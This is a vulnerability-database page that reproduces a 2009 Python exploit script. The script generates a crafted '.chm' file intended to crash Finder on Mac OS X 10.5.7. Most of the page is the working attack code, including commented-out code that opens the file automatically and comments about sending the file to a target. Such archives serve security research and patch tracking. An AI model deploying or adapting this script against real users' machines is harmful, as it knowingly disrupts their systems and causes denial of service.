Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit

🗓️ 07 Aug 2009 00:00:00Reported by Dr_IDEType 
zdt
 zdt🔗 0day.today👁 27 Views

Mac OS X 10.5.7 (.CHM File) Local Finder Denial of Servic

Code
======================================================================
Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit
======================================================================


#!/usr/bin/env python

import os;

print """
###############################################################################
#									      #
# Mac OS X 10.5.7 Local Finder.app DoS (.CHM)		                      #
# By: Dr_IDE and s0kket						    	      #
# Greets to offsec                                                            #
# Tested on OS X 10.5.7 (This will most likely kill more than this version.   #
#      									      #
###############################################################################
\n""";

fname = (raw_input(" [*] Enter the filename you would like to create:"));
print " [*] Creating Evil .CHM file...";

try:
	f1 = open(fname + '.chm','w');
	f1.write("#################################################\n");
	f1.write("#                                               #\n");
	f1.write("# OSX 10.5.7(X?) Local Finder.app DoS (.CHM)    #\n");
	f1.write("# By: Dr_IDE and s0kket.                        #\n");          
	f1.write("# Greets to offsec.                             #\n");
	f1.write("# It really shouldn't be this easy...           #\n");
	f1.write("#                                               #\n");
	f1.write("#################################################\n\n");
	f1.close();

	print " [*] Payload has been created.";
	print " [*] If the user opens the payload with Finder they won't be happy.";

	#
	# There are two options for this attack:
	# 1.) You can choose to automagically open the chm finder. 
	# As long as a VMware/Parallels isn't installed then finder is 
	# the default app for this extension.
	#
	# 2.) We will just create file and send it/upload it to the target. 
	#
	# Note: Only uncomment one of these lines at a time.
	#
	
	# This will mess up the system pretty bad, only way out is 
	# reboot or force quit of Finder.app
	#x = os.system('open ' + fname + '.chm');
	
	# This will create the offending .chm file and quit.
	x = raw_input(" [*] Press Enter to Quit.");

except:
	print "Error."




#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Aug 2009 00:00Current
7High risk
Vulners AI Score7
mac os x 10.5.7chm filelocal finder denialdos exploitpython script
27